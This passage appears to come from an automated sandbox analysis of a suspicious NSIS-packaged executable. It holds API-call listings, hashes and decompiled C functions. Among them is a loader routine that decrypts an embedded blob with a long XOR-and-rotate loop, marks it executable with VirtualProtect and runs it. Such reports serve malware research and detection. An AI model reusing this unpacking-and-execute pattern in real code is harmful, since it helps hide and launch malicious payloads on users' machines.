                                                                                                • DeleteFileA.KERNELBASE(1033), ref: 00403256
                                                                                                • OleUninitialize.OLE32(00000000), ref: 004032D4
                                                                                                • ExitProcess.KERNEL32 ref: 004032F4
                                                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\xxTzyGLZx5.exe" ,00000000,00000000), ref: 00403300
                                                                                                • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\xxTzyGLZx5.exe" ,00000000,00000000), ref: 0040330C
                                                                                                • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403318
                                                                                                • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 0040331F
                                                                                                • DeleteFileA.KERNEL32(00428B90,00428B90,?,0042F000,?), ref: 00403369
                                                                                                • CopyFileA.KERNEL32 ref: 0040337D
                                                                                                • CloseHandle.KERNEL32(00000000,00428B90,00428B90,?,00428B90,00000000), ref: 004033AA
                                                                                                • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 004033FF
                                                                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 0040343B
                                                                                                • ExitProcess.KERNEL32 ref: 0040345E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: File$DirectoryExitHandleProcess$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                • String ID: /D=$ _?=$"$"C:\Users\user\Desktop\xxTzyGLZx5.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\xxTzyGLZx5.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$jpfyweowskz Setup$~nsu.tmp
                                                                                                • API String ID: 2278157092-1661137418
                                                                                                • Opcode ID: 42fbd4ffd9c76b05c6d7acdaa9b905c8558d3fdf648afba1936b073eb85bdc76
                                                                                                • Instruction ID: aabb0dff5c64eb2fc36eb922ef2e6ed89ac062b0c308e186071ee6cedd25840a
                                                                                                • Opcode Fuzzy Hash: 42fbd4ffd9c76b05c6d7acdaa9b905c8558d3fdf648afba1936b073eb85bdc76
                                                                                                • Instruction Fuzzy Hash: F491E370908740AEE7216FA2AD49B6B7E9CEB0570AF04047FF541B61D2C77C9E058B6E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 94%
                                                                                                			E00405250(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
                                                                                                				signed int _v8;
                                                                                                				signed int _v12;
                                                                                                				struct _WIN32_FIND_DATAA _v332;
                                                                                                				signed int _t37;
                                                                                                				char* _t49;
                                                                                                				signed int _t52;
                                                                                                				signed int _t55;
                                                                                                				signed int _t61;
                                                                                                				signed int _t63;
                                                                                                				void* _t65;
                                                                                                				signed int _t68;
                                                                                                				CHAR* _t70;
                                                                                                				CHAR* _t72;
                                                                                                				char* _t75;
                                                                                                
                                                                                                				_t72 = _a4;
                                                                                                				_t37 = E004054FF(__eflags, _t72);
                                                                                                				_v12 = _t37;
                                                                                                				if((_a8 & 0x00000008) != 0) {
                                                                                                					_t63 = DeleteFileA(_t72); // executed
                                                                                                					asm("sbb eax, eax");
                                                                                                					_t65 =  ~_t63 + 1;
                                                                                                					 *0x42ebe8 =  *0x42ebe8 + _t65;
                                                                                                					return _t65;
                                                                                                				}
                                                                                                				_t68 = _a8 & 0x00000001;
                                                                                                				__eflags = _t68;
                                                                                                				_v8 = _t68;
                                                                                                				if(_t68 == 0) {
                                                                                                					L5:
                                                                                                					E0040592B(0x42afe0, _t72);
                                                                                                					__eflags = _t68;
                                                                                                					if(_t68 == 0) {
                                                                                                						E00405465(_t72);
                                                                                                					} else {
                                                                                                						lstrcatA(0x42afe0, "\*.*");
                                                                                                					}
                                                                                                					__eflags =  *_t72;
                                                                                                					if( *_t72 != 0) {
                                                                                                						L10:
                                                                                                						lstrcatA(_t72, 0x40900c);
                                                                                                						L11:
                                                                                                						_t70 =  &(_t72[lstrlenA(_t72)]);
                                                                                                						_t37 = FindFirstFileA(0x42afe0,  &_v332);
                                                                                                						__eflags = _t37 - 0xffffffff;
                                                                                                						_a4 = _t37;
                                                                                                						if(_t37 == 0xffffffff) {
                                                                                                							L29:
                                                                                                							__eflags = _v8;
                                                                                                							if(_v8 != 0) {
                                                                                                								_t31 = _t70 - 1;
                                                                                                								 *_t31 =  *(_t70 - 1) & 0x00000000;
                                                                                                								__eflags =  *_t31;
                                                                                                							}
                                                                                                							goto L31;
                                                                                                						} else {
                                                                                                							goto L12;
                                                                                                						}
                                                                                                						do {
                                                                                                							L12:
                                                                                                							_t75 =  &(_v332.cFileName);
                                                                                                							_t49 = E00405449( &(_v332.cFileName), 0x3f);
                                                                                                							__eflags =  *_t49;
                                                                                                							if( *_t49 != 0) {
                                                                                                								__eflags = _v332.cAlternateFileName;
                                                                                                								if(_v332.cAlternateFileName != 0) {
                                                                                                									_t75 =  &(_v332.cAlternateFileName);
                                                                                                								}
                                                                                                							}
                                                                                                							__eflags =  *_t75 - 0x2e;
                                                                                                							if( *_t75 != 0x2e) {
                                                                                                								L19:
                                                                                                								E0040592B(_t70, _t75);
                                                                                                								__eflags = _v332.dwFileAttributes & 0x00000010;
                                                                                                								if((_v332.dwFileAttributes & 0x00000010) == 0) {
                                                                                                									E004055E3(_t72);
                                                                                                									_t52 = DeleteFileA(_t72);
                                                                                                									__eflags = _t52;
                                                                                                									if(_t52 != 0) {
                                                                                                										E00404CC9(0xfffffff2, _t72);
                                                                                                									} else {
                                                                                                										__eflags = _a8 & 0x00000004;
                                                                                                										if((_a8 & 0x00000004) == 0) {
                                                                                                											 *0x42ebe8 =  *0x42ebe8 + 1;
                                                                                                										} else {
                                                                                                											E00404CC9(0xfffffff1, _t72);
                                                                                                											_push(0);
                                                                                                											_push(_t72);
                                                                                                											E00405679();
                                                                                                										}
                                                                                                									}
                                                                                                								} else {
                                                                                                									__eflags = (_a8 & 0x00000003) - 3;
                                                                                                									if(__eflags == 0) {
                                                                                                										E00405250(_t70, __eflags, _t72, _a8);
                                                                                                									}
                                                                                                								}
                                                                                                								goto L27;
                                                                                                							}
                                                                                                							_t61 =  *((intOrPtr*)(_t75 + 1));
                                                                                                							__eflags = _t61;
                                                                                                							if(_t61 == 0) {
                                                                                                								goto L27;
                                                                                                							}
                                                                                                							__eflags = _t61 - 0x2e;
                                                                                                							if(_t61 != 0x2e) {
                                                                                                								goto L19;
                                                                                                							}
                                                                                                							__eflags =  *((char*)(_t75 + 2));
                                                                                                							if( *((char*)(_t75 + 2)) == 0) {
                                                                                                								goto L27;
                                                                                                							}
                                                                                                							goto L19;
                                                                                                							L27:
                                                                                                							_t55 = FindNextFileA(_a4,  &_v332);
                                                                                                							__eflags = _t55;
                                                                                                						} while (_t55 != 0);
                                                                                                						_t37 = FindClose(_a4);
                                                                                                						goto L29;
                                                                                                					}
                                                                                                					__eflags =  *0x42afe0 - 0x5c;
                                                                                                					if( *0x42afe0 != 0x5c) {
                                                                                                						goto L11;
                                                                                                					}
                                                                                                					goto L10;
                                                                                                				} else {
                                                                                                					__eflags = _t37;
                                                                                                					if(_t37 == 0) {
                                                                                                						L31:
                                                                                                						__eflags = _v8;
                                                                                                						if(_v8 == 0) {
                                                                                                							L39:
                                                                                                							return _t37;
                                                                                                						}
                                                                                                						__eflags = _v12;
                                                                                                						if(_v12 != 0) {
                                                                                                							_t37 = E00405C22(_t72);
                                                                                                							__eflags = _t37;
                                                                                                							if(_t37 == 0) {
                                                                                                								goto L39;
                                                                                                							}
                                                                                                							E0040541E(_t72);
                                                                                                							E004055E3(_t72);
                                                                                                							_t37 = RemoveDirectoryA(_t72);
                                                                                                							__eflags = _t37;
                                                                                                							if(_t37 != 0) {
                                                                                                								return E00404CC9(0xffffffe5, _t72);
                                                                                                							}
                                                                                                							__eflags = _a8 & 0x00000004;
                                                                                                							if((_a8 & 0x00000004) == 0) {
                                                                                                								goto L33;
                                                                                                							}
                                                                                                							E00404CC9(0xfffffff1, _t72);
                                                                                                							_push(0);
                                                                                                							_push(_t72);
                                                                                                							return E00405679();
                                                                                                						}
                                                                                                						L33:
                                                                                                						 *0x42ebe8 =  *0x42ebe8 + 1;
                                                                                                						return _t37;
                                                                                                					}
                                                                                                					__eflags = _a8 & 0x00000002;
                                                                                                					if((_a8 & 0x00000002) == 0) {
                                                                                                						goto L31;
                                                                                                					}
                                                                                                					goto L5;
                                                                                                				}
                                                                                                			}


















                                                                                                APIs
                                                                                                • DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\xxTzyGLZx5.exe" ,00000000), ref: 0040526E
                                                                                                • lstrcatA.KERNEL32(0042AFE0,\*.*,0042AFE0,?,00000000,?,"C:\Users\user\Desktop\xxTzyGLZx5.exe" ,00000000), ref: 004052B8
                                                                                                • lstrcatA.KERNEL32(?,0040900C,?,0042AFE0,?,00000000,?,"C:\Users\user\Desktop\xxTzyGLZx5.exe" ,00000000), ref: 004052D9
                                                                                                • lstrlenA.KERNEL32(?,?,0040900C,?,0042AFE0,?,00000000,?,"C:\Users\user\Desktop\xxTzyGLZx5.exe" ,00000000), ref: 004052DF
                                                                                                • FindFirstFileA.KERNEL32(0042AFE0,?,?,?,0040900C,?,0042AFE0,?,00000000,?,"C:\Users\user\Desktop\xxTzyGLZx5.exe" ,00000000), ref: 004052F0
                                                                                                • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 004053A2
                                                                                                • FindClose.KERNEL32(?), ref: 004053B3
                                                                                                Strings
                                                                                                • \*.*, xrefs: 004052B2
                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405250
                                                                                                • "C:\Users\user\Desktop\xxTzyGLZx5.exe" , xrefs: 0040525A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                • String ID: "C:\Users\user\Desktop\xxTzyGLZx5.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                • API String ID: 2035342205-2690760731
                                                                                                • Opcode ID: a22421f420a0055125289edea63265979e601a45820f011afd9a607384fe30c9
                                                                                                • Instruction ID: 18b38f57d6fcfee0f7be8354c3f8d746a349f6914723925c053c0c26f7a8b105
                                                                                                • Opcode Fuzzy Hash: a22421f420a0055125289edea63265979e601a45820f011afd9a607384fe30c9
                                                                                                • Instruction Fuzzy Hash: DF512270804B54A6DB226B228C45BBF3A68CF82759F14817FFC45751C2C7BC4982CE6E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E6EDAF530(void* __ecx) {
                                                                                                				_Unknown_base(*)()* _v8;
                                                                                                				_Unknown_base(*)()* _v12;
                                                                                                				intOrPtr _t12;
                                                                                                				void* _t51;
                                                                                                				signed int _t86;
                                                                                                				signed int _t87;
                                                                                                				signed int _t89;
                                                                                                				char _t120;
                                                                                                
                                                                                                				_t51 = __ecx;
                                                                                                				_v12 = GetProcAddress(LoadLibraryW(L"kernel32.dll"), "VirtualProtect");
                                                                                                				_v8 = GetProcAddress(LoadLibraryW(L"kernel32.dll"), "VirtualAlloc");
                                                                                                				 *0x6edc72a4 = VirtualAlloc(0, 0x11e1a300, 0x3000, 4);
                                                                                                				if( *0x6edc72a4 != 0) {
                                                                                                					_t12 =  *0x6edc72a4; // 0x2980000
                                                                                                					E6EDAF8F0(_t51, _t12, 0x11e1a300);
                                                                                                					 *0x6edc72a0 = 0;
                                                                                                					while( *0x6edc72a0 < 0x12ec) {
                                                                                                						_t89 =  *0x6edc72a0; // 0x12ec
                                                                                                						_t4 =  &E6EDC2000 + _t89; // 0x7265766f
                                                                                                						 *0x6edc7f28 =  *_t4;
                                                                                                						 *0x6edc7f28 =  *0x6edc7f28 & 0x000000ff ^ 0x00000068;
                                                                                                						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) +  *0x6edc72a0;
                                                                                                						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) >> 0x00000005 | ( *0x6edc7f28 & 0x000000ff) << 0x00000003;
                                                                                                						 *0x6edc7f28 =  ~( *0x6edc7f28 & 0x000000ff);
                                                                                                						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) +  *0x6edc72a0;
                                                                                                						 *0x6edc7f28 =  !( *0x6edc7f28 & 0x000000ff);
                                                                                                						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) -  *0x6edc72a0;
                                                                                                						 *0x6edc7f28 =  *0x6edc7f28 & 0x000000ff ^ 0x0000001f;
                                                                                                						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) >> 0x00000002 | ( *0x6edc7f28 & 0x000000ff) << 0x00000006;
                                                                                                						 *0x6edc7f28 =  *0x6edc7f28 & 0x000000ff ^  *0x6edc72a0;
                                                                                                						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) - 0x5a;
                                                                                                						 *0x6edc7f28 =  *0x6edc7f28 & 0x000000ff ^ 0x0000007a;
                                                                                                						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) -  *0x6edc72a0;
                                                                                                						 *0x6edc7f28 =  ~( *0x6edc7f28 & 0x000000ff);
                                                                                                						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) + 0x98;
                                                                                                						 *0x6edc7f28 =  !( *0x6edc7f28 & 0x000000ff);
                                                                                                						 *0x6edc7f28 =  *0x6edc7f28 & 0x000000ff ^ 0x00000021;
                                                                                                						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) - 0x76;
                                                                                                						 *0x6edc7f28 =  *0x6edc7f28 & 0x000000ff ^ 0x0000008b;
                                                                                                						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) - 0xef;
                                                                                                						 *0x6edc7f28 =  !( *0x6edc7f28 & 0x000000ff);
                                                                                                						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) - 0xcf;
                                                                                                						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) >> 0x00000006 | ( *0x6edc7f28 & 0x000000ff) << 0x00000002;
                                                                                                						 *0x6edc7f28 =  ~( *0x6edc7f28 & 0x000000ff);
                                                                                                						 *0x6edc7f28 =  *0x6edc7f28 & 0x000000ff ^ 0x00000086;
                                                                                                						 *0x6edc7f28 =  ~( *0x6edc7f28 & 0x000000ff);
                                                                                                						 *0x6edc7f28 =  !( *0x6edc7f28 & 0x000000ff);
                                                                                                						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) >> 0x00000001 | ( *0x6edc7f28 & 0x000000ff) << 0x00000007;
                                                                                                						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) +  *0x6edc72a0;
                                                                                                						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) >> 0x00000007 | ( *0x6edc7f28 & 0x000000ff) << 0x00000001;
                                                                                                						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) -  *0x6edc72a0;
                                                                                                						 *0x6edc7f28 =  *0x6edc7f28 & 0x000000ff ^  *0x6edc72a0;
                                                                                                						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) -  *0x6edc72a0;
                                                                                                						 *0x6edc7f28 =  !( *0x6edc7f28 & 0x000000ff);
                                                                                                						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) +  *0x6edc72a0;
                                                                                                						 *0x6edc7f28 =  *0x6edc7f28 & 0x000000ff ^  *0x6edc72a0;
                                                                                                						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) +  *0x6edc72a0;
                                                                                                						 *0x6edc7f28 =  *0x6edc7f28 & 0x000000ff ^ 0x000000bb;
                                                                                                						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) + 0x24;
                                                                                                						 *0x6edc7f28 =  *0x6edc7f28 & 0x000000ff ^  *0x6edc72a0;
                                                                                                						_t86 =  *0x6edc72a0; // 0x12ec
                                                                                                						_t120 =  *0x6edc7f28; // 0x0
                                                                                                						 *((char*)( &E6EDC2000 + _t86)) = _t120;
                                                                                                						_t87 =  *0x6edc72a0; // 0x12ec
                                                                                                						 *0x6edc72a0 = _t87 + 1;
                                                                                                					}
                                                                                                					VirtualProtect( &E6EDC2000, 0x12ec, 0x40, 0x6edc7f24);
                                                                                                					E6EDC2000(); // executed
                                                                                                					return 0;
                                                                                                				}
                                                                                                				return 0;
                                                                                                			}












                                                                                                APIs
                                                                                                • LoadLibraryW.KERNEL32(kernel32.dll,VirtualProtect), ref: 6EDAF540
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 6EDAF547
                                                                                                • LoadLibraryW.KERNEL32(kernel32.dll,VirtualAlloc), ref: 6EDAF55A
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 6EDAF561
                                                                                                • VirtualAlloc.KERNELBASE(00000000,11E1A300,00003000,00000004), ref: 6EDAF578
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: AddressLibraryLoadProc$AllocVirtual
                                                                                                • String ID: VirtualAlloc$VirtualProtect$kernel32.dll$kernel32.dll
                                                                                                • API String ID: 1786449878-3286849197
                                                                                                • Opcode ID: 1de341b4d54db0b1cb2eae76027c244879ed7c3ca5030bc40575109cc48a9709
                                                                                                • Instruction ID: beb1050e1a7010fea8d81696bef197e21a36ca1f158daa8fbdb20c8e32a26e10
                                                                                                • Opcode Fuzzy Hash: 1de341b4d54db0b1cb2eae76027c244879ed7c3ca5030bc40575109cc48a9709
                                                                                                • Instruction Fuzzy Hash: 5E91286440DEDABDFF17877B84EC1607FAD562FAF2728408AE0D2462C6C56442C7DB25
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 6EDC24DC
                                                                                                • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,?,?,6EDC218A,7FC6FA16,6EDC2349), ref: 6EDC2506
                                                                                                • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,6EDC218A,7FC6FA16), ref: 6EDC251D
                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,6EDC218A,7FC6FA16,6EDC2349), ref: 6EDC253F
                                                                                                • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,6EDC218A,7FC6FA16,6EDC2349,00000000,00000000), ref: 6EDC25B2
                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,6EDC218A,7FC6FA16,6EDC2349), ref: 6EDC25BD
                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,6EDC218A,7FC6FA16,6EDC2349,00000000), ref: 6EDC2608
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                                                                                                • String ID:
                                                                                                • API String ID: 656311269-0
                                                                                                • Opcode ID: af7b555d49f7dab9e8ba194529cc05e2405c0ec283943ac24b372fda9630fd69
                                                                                                • Instruction ID: 29806ce40b8026486001e21f77a9aa2ef82c12f616e1f3678abd0f267b2c9485
                                                                                                • Opcode Fuzzy Hash: af7b555d49f7dab9e8ba194529cc05e2405c0ec283943ac24b372fda9630fd69
                                                                                                • Instruction Fuzzy Hash: 4861B170E10A05ABDB10CFF4C894BAEB7B9BF48B54F109419E511EB390EB70DD418B66
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E00405C49(signed int _a4) {
                                                                                                				struct HINSTANCE__* _t5;
                                                                                                				CHAR* _t7;
                                                                                                				signed int _t9;
                                                                                                
                                                                                                				_t9 = _a4 << 3;
                                                                                                				_t7 =  *(_t9 + 0x4091f8);
                                                                                                				_t5 = GetModuleHandleA(_t7);
                                                                                                				if(_t5 != 0) {
                                                                                                					L2:
                                                                                                					return GetProcAddress(_t5,  *(_t9 + 0x4091fc));
                                                                                                				}
                                                                                                				_t5 = LoadLibraryA(_t7); // executed
                                                                                                				if(_t5 != 0) {
                                                                                                					goto L2;
                                                                                                				}
                                                                                                				return _t5;
                                                                                                			}







                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C5B
                                                                                                • LoadLibraryA.KERNELBASE(?,?,00000000,00403126,00000008), ref: 00405C66
                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00405C77
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                • String ID:
                                                                                                • API String ID: 310444273-0
                                                                                                • Opcode ID: fc658b4faf86fd9df0ae4f37537bc1bd8d984ae3d6aa4247b09a4764ab3a2bdc
                                                                                                • Instruction ID: 3d59114c1a23b0d625c809938346f6a0554fd3dae4d1067b70da7b5bee76f7f8
                                                                                                • Opcode Fuzzy Hash: fc658b4faf86fd9df0ae4f37537bc1bd8d984ae3d6aa4247b09a4764ab3a2bdc
                                                                                                • Instruction Fuzzy Hash: B4E08632A0861557E6114F309E4CD6773A8DE866403010439F505F6140D734AC11AFBA
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E00405C22(CHAR* _a4) {
                                                                                                				void* _t2;
                                                                                                
                                                                                                				_t2 = FindFirstFileA(_a4, 0x42c028); // executed
                                                                                                				if(_t2 == 0xffffffff) {
                                                                                                					return 0;
                                                                                                				}
                                                                                                				FindClose(_t2);
                                                                                                				return 0x42c028;
                                                                                                			}





                                                                                                APIs
                                                                                                • FindFirstFileA.KERNELBASE(?,0042C028,0042B3E0,00405542,0042B3E0,0042B3E0,00000000,0042B3E0,0042B3E0,?,?,00000000,00405264,?,"C:\Users\user\Desktop\xxTzyGLZx5.exe" ,00000000), ref: 00405C2D
                                                                                                • FindClose.KERNEL32(00000000), ref: 00405C39
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: Find$CloseFileFirst
                                                                                                • String ID:
                                                                                                • API String ID: 2295610775-0
                                                                                                • Opcode ID: 93a427bfd80f56c82a5a4d8bd6fda67f37b59ad8eed9f57ff1b743868f20ffd4
                                                                                                • Instruction ID: 1d1880cbde17bc14012e82a4269dfe036a3ba599bb462203ffcaea8973668f8b
                                                                                                • Opcode Fuzzy Hash: 93a427bfd80f56c82a5a4d8bd6fda67f37b59ad8eed9f57ff1b743868f20ffd4
                                                                                                • Instruction Fuzzy Hash: A5D0123694DA209BD3541778BD0CC8B7A58DF593317104B32F026F22E4D7388C518EAE
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 84%
                                                                                                			E0040380A(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                                                                                                				struct HWND__* _v32;
                                                                                                				void* _v84;
                                                                                                				void* _v88;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				signed int _t35;
                                                                                                				signed int _t37;
                                                                                                				signed int _t39;
                                                                                                				intOrPtr _t44;
                                                                                                				struct HWND__* _t49;
                                                                                                				signed int _t67;
                                                                                                				struct HWND__* _t73;
                                                                                                				signed int _t86;
                                                                                                				struct HWND__* _t91;
                                                                                                				signed int _t99;
                                                                                                				int _t103;
                                                                                                				signed int _t115;
                                                                                                				signed int _t116;
                                                                                                				int _t117;
                                                                                                				signed int _t122;
                                                                                                				struct HWND__* _t125;
                                                                                                				struct HWND__* _t126;
                                                                                                				int _t127;
                                                                                                				long _t130;
                                                                                                				int _t132;
                                                                                                				int _t133;
                                                                                                				void* _t134;
                                                                                                				void* _t142;
                                                                                                
                                                                                                				_t115 = _a8;
                                                                                                				if(_t115 == 0x110 || _t115 == 0x408) {
                                                                                                					_t35 = _a12;
                                                                                                					_t125 = _a4;
                                                                                                					__eflags = _t115 - 0x110;
                                                                                                					 *0x429fbc = _t35;
                                                                                                					if(_t115 == 0x110) {
                                                                                                						 *0x42eb68 = _t125;
                                                                                                						 *0x429fd0 = GetDlgItem(_t125, 1);
                                                                                                						_t91 = GetDlgItem(_t125, 2);
                                                                                                						_push(0xffffffff);
                                                                                                						_push(0x1c);
                                                                                                						 *0x428f98 = _t91;
                                                                                                						E00403CDD(_t125);
                                                                                                						SetClassLongA(_t125, 0xfffffff2,  *0x42e348); // executed
                                                                                                						 *0x42e32c = E0040140B(4);
                                                                                                						_t35 = 1;
                                                                                                						__eflags = 1;
                                                                                                						 *0x429fbc = 1;
                                                                                                					}
                                                                                                					_t122 =  *0x40919c; // 0xffffffff
                                                                                                					_t133 = 0;
                                                                                                					_t130 = (_t122 << 6) +  *0x42eb80;
                                                                                                					__eflags = _t122;
                                                                                                					if(_t122 < 0) {
                                                                                                						L34:
                                                                                                						E00403D29(0x40b);
                                                                                                						while(1) {
                                                                                                							_t37 =  *0x429fbc;
                                                                                                							 *0x40919c =  *0x40919c + _t37;
                                                                                                							_t130 = _t130 + (_t37 << 6);
                                                                                                							_t39 =  *0x40919c; // 0xffffffff
                                                                                                							__eflags = _t39 -  *0x42eb84; // 0x2
                                                                                                							if(__eflags == 0) {
                                                                                                								E0040140B(1);
                                                                                                							}
